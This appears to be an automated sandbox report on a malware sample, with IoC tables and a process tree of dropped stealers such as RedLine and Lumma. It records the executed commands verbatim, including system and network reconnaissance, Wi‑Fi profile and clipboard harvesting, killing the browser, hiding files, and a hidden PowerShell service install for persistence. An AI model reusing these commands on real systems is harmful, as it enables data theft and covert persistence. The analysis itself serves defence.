4352	redline123123.exe
4352	redline123123.exe
2372	svhoost.exe
2372	svhoost.exe
5436	RegAsm.exe
5436	RegAsm.exe
2372	svhoost.exe
2372	svhoost.exe
4352	redline123123.exe
4352	redline123123.exe
5436	RegAsm.exe
5436	RegAsm.exe
5300	RegAsm.exe
5300	RegAsm.exe
5056	powershell.exe
5056	powershell.exe
5056	powershell.exe
5360	powershell.exe
5360	powershell.exe
5360	powershell.exe
872	powershell.exe
872	powershell.exe
872	powershell.exe
5448	powershell.exe
5448	powershell.exe
5448	powershell.exe
972	axplong.exe
972	axplong.exe
3508	explortu.exe
3508	explortu.exe
2352	powershell.exe
2352	powershell.exe
2352	powershell.exe
5292	powershell.exe
5292	powershell.exe
5292	powershell.exe
5324	powershell.exe
5324	powershell.exe
5336	powershell.exe
5336	powershell.exe
5276	powershell.exe
5276	powershell.exe
668	powershell.exe
668	powershell.exe
2324	powershell.exe
2324	powershell.exe
972	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2492	chrome.exe
Token: SeCreatePagefilePrivilege	2492	chrome.exe
Token: SeShutdownPrivilege	2492	chrome.exe
Token: SeCreatePagefilePrivilege	2492	chrome.exe
Token: SeShutdownPrivilege	2492	chrome.exe
Token: SeCreatePagefilePrivilege	2492	chrome.exe
Token: SeShutdownPrivilege	2492	chrome.exe
Token: SeCreatePagefilePrivilege	2492	chrome.exe
Token: SeShutdownPrivilege	2492	chrome.exe
Token: SeCreatePagefilePrivilege	2492	chrome.exe
Token: SeShutdownPrivilege	2492	chrome.exe
Token: SeCreatePagefilePrivilege	2492	chrome.exe
Token: SeIncreaseQuotaPrivilege	3920	WMIC.exe
Token: SeSecurityPrivilege	3920	WMIC.exe
Token: SeTakeOwnershipPrivilege	3920	WMIC.exe
Token: SeLoadDriverPrivilege	3920	WMIC.exe
Token: SeSystemProfilePrivilege	3920	WMIC.exe
Token: SeSystemtimePrivilege	3920	WMIC.exe
Token: SeProfSingleProcessPrivilege	3920	WMIC.exe
Token: SeIncBasePriorityPrivilege	3920	WMIC.exe
Token: SeCreatePagefilePrivilege	3920	WMIC.exe
Token: SeBackupPrivilege	3920	WMIC.exe
Token: SeRestorePrivilege	3920	WMIC.exe
Token: SeShutdownPrivilege	3920	WMIC.exe
Token: SeDebugPrivilege	3920	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3920	WMIC.exe
Token: SeRemoteShutdownPrivilege	3920	WMIC.exe
Token: SeUndockPrivilege	3920	WMIC.exe
Token: SeManageVolumePrivilege	3920	WMIC.exe
Token: 33	3920	WMIC.exe
Token: 34	3920	WMIC.exe
Token: 35	3920	WMIC.exe
Token: 36	3920	WMIC.exe
Token: SeShutdownPrivilege	2492	chrome.exe
Token: SeCreatePagefilePrivilege	2492	chrome.exe
Token: SeIncreaseQuotaPrivilege	3920	WMIC.exe
Token: SeSecurityPrivilege	3920	WMIC.exe
Token: SeTakeOwnershipPrivilege	3920	WMIC.exe
Token: SeLoadDriverPrivilege	3920	WMIC.exe
Token: SeSystemProfilePrivilege	3920	WMIC.exe
Token: SeSystemtimePrivilege	3920	WMIC.exe
Token: SeProfSingleProcessPrivilege	3920	WMIC.exe
Token: SeIncBasePriorityPrivilege	3920	WMIC.exe
Token: SeCreatePagefilePrivilege	3920	WMIC.exe
Token: SeBackupPrivilege	3920	WMIC.exe
Token: SeRestorePrivilege	3920	WMIC.exe
Token: SeShutdownPrivilege	3920	WMIC.exe
Token: SeDebugPrivilege	3920	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3920	WMIC.exe
Token: SeRemoteShutdownPrivilege	3920	WMIC.exe
Token: SeUndockPrivilege	3920	WMIC.exe
Token: SeManageVolumePrivilege	3920	WMIC.exe
Token: 33	3920	WMIC.exe
Token: 34	3920	WMIC.exe
Token: 35	3920	WMIC.exe
Token: 36	3920	WMIC.exe
Token: SeDebugPrivilege	1200	tasklist.exe
Token: SeShutdownPrivilege	2492	chrome.exe
Token: SeCreatePagefilePrivilege	2492	chrome.exe
Token: SeDebugPrivilege	1656	taskkill.exe
Token: SeDebugPrivilege	5100	One.exe
Token: SeShutdownPrivilege	2492	chrome.exe
Token: SeCreatePagefilePrivilege	2492	chrome.exe
Token: SeDebugPrivilege	5896	tasklist.exe

Suspicious use of FindShellTrayWindow 46 IoCs

pid	Process
5044	3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe
2364	7700de6bf0.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2492	chrome.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2988	bin.exe

Suspicious use of SendNotifyMessage 40 IoCs

pid	Process
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2492	chrome.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe
2168	38f0c3dd14.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4788	dd6917148a.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5044 wrote to memory of 336	5044	3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe	84
PID 5044 wrote to memory of 336	5044	3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe	84
PID 5044 wrote to memory of 336	5044	3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe	84
PID 336 wrote to memory of 4280	336	explortu.exe	85
PID 336 wrote to memory of 4280	336	explortu.exe	85
PID 336 wrote to memory of 4280	336	explortu.exe	85
PID 336 wrote to memory of 2364	336	explortu.exe	86
PID 336 wrote to memory of 2364	336	explortu.exe	86
PID 336 wrote to memory of 2364	336	explortu.exe	86
PID 336 wrote to memory of 4788	336	explortu.exe	87
PID 336 wrote to memory of 4788	336	explortu.exe	87
PID 336 wrote to memory of 4788	336	explortu.exe	87
PID 2364 wrote to memory of 1120	2364	7700de6bf0.exe	88
PID 2364 wrote to memory of 1120	2364	7700de6bf0.exe	88
PID 2364 wrote to memory of 1120	2364	7700de6bf0.exe	88
PID 336 wrote to memory of 2168	336	explortu.exe	89
PID 336 wrote to memory of 2168	336	explortu.exe	89
PID 336 wrote to memory of 2168	336	explortu.exe	89
PID 2168 wrote to memory of 2492	2168	38f0c3dd14.exe	90
PID 2168 wrote to memory of 2492	2168	38f0c3dd14.exe	90
PID 2492 wrote to memory of 2004	2492	chrome.exe	92
PID 2492 wrote to memory of 2004	2492	chrome.exe	92
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 4496	2492	chrome.exe	93
PID 2492 wrote to memory of 872	2492	chrome.exe	94
PID 2492 wrote to memory of 872	2492	chrome.exe	94
PID 2492 wrote to memory of 4444	2492	chrome.exe	95
PID 2492 wrote to memory of 4444	2492	chrome.exe	95
PID 2492 wrote to memory of 4444	2492	chrome.exe	95
PID 2492 wrote to memory of 4444	2492	chrome.exe	95
PID 2492 wrote to memory of 4444	2492	chrome.exe	95
PID 2492 wrote to memory of 4444	2492	chrome.exe	95
PID 2492 wrote to memory of 4444	2492	chrome.exe	95
PID 2492 wrote to memory of 4444	2492	chrome.exe	95
PID 2492 wrote to memory of 4444	2492	chrome.exe	95

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2432	attrib.exe

C:\Users\Admin\AppData\Local\Temp\3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe
"C:\Users\Admin\AppData\Local\Temp\3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5044
- C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
  "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:336
- - C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
    "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
    3⤵
    PID:4280
- - C:\Users\Admin\1000015002\7700de6bf0.exe
    "C:\Users\Admin\1000015002\7700de6bf0.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:1120
    - - C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
        5⤵
        Executes dropped EXE
        
        PID:624
      - C:\Users\Admin\AppData\Local\Temp\onefile_624_133631691487817767\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:1596
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        7⤵
        
        PID:2424
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
        7⤵
        
        PID:2852
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
        8⤵
        Views/modifies file attributes
        
        PID:2432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
        7⤵
        
        PID:1596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        7⤵
        
        PID:2184
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:5712
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        7⤵
        
        PID:5720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        7⤵
        
        PID:5728
        
        C:\Windows\system32\chcp.com
        
        chcp
        8⤵
        
        PID:5904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        7⤵
        
        PID:5736
        
        C:\Windows\system32\chcp.com
        
        chcp
        8⤵
        
        PID:5888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        7⤵
        
        PID:5940
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        8⤵
        
        PID:6128
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        7⤵
        
        PID:6012
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        8⤵
        Gathers system information
        
        PID:5240
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        8⤵
        
        PID:5140
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        8⤵
        Collects information from the system
        
        PID:3960
        
        C:\Windows\system32\net.exe
        
        net user
        8⤵
        
        PID:5928
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        9⤵
        
        PID:5716
        
        C:\Windows\system32\query.exe
        
        query user
        8⤵
        
        PID:736
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        9⤵
        
        PID:3088
        
        C:\Windows\system32\net.exe
        
        net localgroup
        8⤵
        
        PID:1928
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        9⤵
        
        PID:4384
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        8⤵
        
        PID:6052
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        9⤵
        
        PID:6076
        
        C:\Windows\system32\net.exe
        
        net user guest
        8⤵
        
        PID:1800
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        9⤵
        
        PID:5268
        
        C:\Windows\system32\net.exe
        
        net user administrator
        8⤵
        
        PID:5876
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        9⤵
        
        PID:5720
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        8⤵
        
        PID:5012
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        8⤵
        Enumerates processes with tasklist
        
        PID:4956
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        8⤵
        Gathers network information
        
        PID:6000
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        8⤵
        
        PID:5988
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        8⤵
        
        PID:5796
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        8⤵
        Gathers network information
        
        PID:5700
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        8⤵
        Launches sc.exe
        
        PID:5688
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        8⤵
        Modifies Windows Firewall
        
        PID:5748
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        8⤵
        Modifies Windows Firewall
        
        PID:1060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:6112
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:5956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:736
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:6076
    - - C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4352
    - - C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2888
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Checks computer location settings
        
        PID:4988
        
        C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
        7⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:2372
        
        C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5100
    - - C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe"
        5⤵
        Executes dropped EXE
        
        PID:4544
      - C:\Users\Admin\AppData\Local\Temp\SetupWizard.exe
        
        SetupWizard.exe
        6⤵
        Executes dropped EXE
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\SetupWizard-f75943ba17e4125d\SetupWizard.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SetupWizard-f75943ba17e4125d\SetupWizard.exe"
        7⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5160
        
        C:\Windows\system32\winsvc.exe
        
        "C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\SetupWizard-f75943ba17e4125d\SetupWizard.exe"
        8⤵
        Executes dropped EXE
        
        PID:1148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5056
        
        C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
        10⤵
        Launches sc.exe
        
        PID:1800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5360
        
        C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
        10⤵
        Launches sc.exe
        
        PID:1256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:872
        
        C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
        10⤵
        Launches sc.exe
        
        PID:4628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5448
        
        C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" start winsvc
        10⤵
        Launches sc.exe
        
        PID:4144
    - - C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5396
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5436
    - - C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
        5⤵
        Executes dropped EXE
        
        PID:5204
    - - C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3512
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:4452
    - - C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4320
      - C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
        6⤵
        Executes dropped EXE
        
        PID:5208
    - - C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
        5⤵
        Executes dropped EXE
        
        PID:2916
      - C:\Users\Admin\AppData\Local\Temp\onefile_2916_133631691772668439\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:1608
    - - C:\Users\Admin\AppData\Local\Temp\1000073001\bin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000073001\bin.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of FindShellTrayWindow
        
        PID:2988
      - C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe"
        6⤵
        Executes dropped EXE
        
        PID:3276
    - - C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5112
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5300
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 240
        6⤵
        Program crash
        
        PID:3352
- - C:\Users\Admin\AppData\Local\Temp\1000016001\dd6917148a.exe
    "C:\Users\Admin\AppData\Local\Temp\1000016001\dd6917148a.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetWindowsHookEx
    PID:4788
- - C:\Users\Admin\AppData\Local\Temp\1000017001\38f0c3dd14.exe
    "C:\Users\Admin\AppData\Local\Temp\1000017001\38f0c3dd14.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2168
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:2492
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ff8e8f5ab58,0x7ff8e8f5ab68,0x7ff8e8f5ab78
        5⤵
        
        PID:2004
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
